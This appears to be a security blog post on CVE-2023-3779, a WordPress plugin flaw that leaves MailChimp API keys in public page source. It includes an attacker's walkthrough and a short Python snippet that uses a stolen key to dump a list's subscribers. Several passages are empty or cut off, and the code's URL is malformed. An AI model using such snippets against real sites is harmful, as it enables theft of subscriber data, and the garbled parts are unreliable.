CVE-2023-3779 - Essential Addons For Elementor API Key Leak — How Attackers Steal Your MailChimp Data

In June 2023, security researchers disclosed a serious vulnerability—CVE-2023-3779—impacting the popular WordPress plugin Essential Addons for Elementor. If you use WordPress sites with the premium version of this plugin and the MailChimp block is active, your MailChimp API key could be exposed to anyone on the web.

This vulnerability affects versions up to and including 5.8.1 of the plugin. Read on to understand how the issue works, why it matters, and what you should do to stay secure.

What is Essential Addons for Elementor?

Essential Addons for Elementor is a widely used plugin that adds advanced widgets and features to WordPress sites built with Elementor. MailChimp integration is one of its premium features, letting site owners easily create newsletter forms and other mailing list functionality.

The Vulnerability: How API Keys Leak

When site owners enable the MailChimp block on a page, the plugin adds the site’s private MailChimp API key directly into the source code of the page —in plain text. This means that anyone, even attackers who are not logged in, can simply view the page source and steal your API key.

Why is this bad?

MailChimp API keys give full control of your mailing lists, subscribers, and campaigns. If an attacker gets it, they can:

Exploit Details

Who is affected?

Plugin version is 5.8.1 or earlier

How easy is it to exploit?
Very easy. Even a beginner can do it – simply browse to a vulnerable web page and view its source.

Exploitation Walkthrough

Let’s say you found a website using Essential Addons for Elementor with a MailChimp email form. Here’s how an attacker would grab the API key:

Code Example (What an attacker might see)

<script type="text/javascript">
  var mailchimp_settings = {
    api_key: "us5-3f2ba6d3e8806jsIu6tb4f1db14f5c8e-us5",
    list_id: "a1b2c3d4e5",
    ...
  };
</script>

Above, "api_key" is publicly visible—this is all an attacker needs.

Real-World Consequences

Let’s say an attacker scrapes your API key. With a simple MailChimp API library, they could run:

# Sample Python snippet
import requests

API_KEY = "us5-3f2ba6d3e8806jsIu6tb4f1db14f5c8e-us5"
LIST_ID = "a1b2c3d4e5"
DC = API_KEY[-3:]  # datacenter code

headers = {
    "Authorization": f"apikey {API_KEY}"
}

response = requests.get(f"https://{DC}.api.mailchimp.com/3./lists/{LIST_ID}/members";, headers=headers)
print(response.json())

This will fetch all your subscribers—no hacking experience needed!

Update Immediately:

Upgrade the Essential Addons for Elementor plugin to the latest version. Changelog here.

Reset Your MailChimp API Key:

- Login to your MailChimp account

Reported: June 2023

- Patched: Version 5.8.2 (release notes)
- CVE Record
- WPScan Entry
- Original Disclosure by Wordfence

Final Thoughts

CVE-2023-3779 is a reminder that even popular plugins with good intentions can leak dangerous secrets if not coded carefully. If you ever embed API keys or other secrets in web code, make sure it only happens server-side—never on the front-end.

If you’ve ever used the MailChimp block in a vulnerable version, treat your API keys as compromised. Act now to protect your lists and reputation.

Timeline

Published on: 07/20/2023 06:15:00 UTC
Last modified on: 07/28/2023 15:41:00 UTC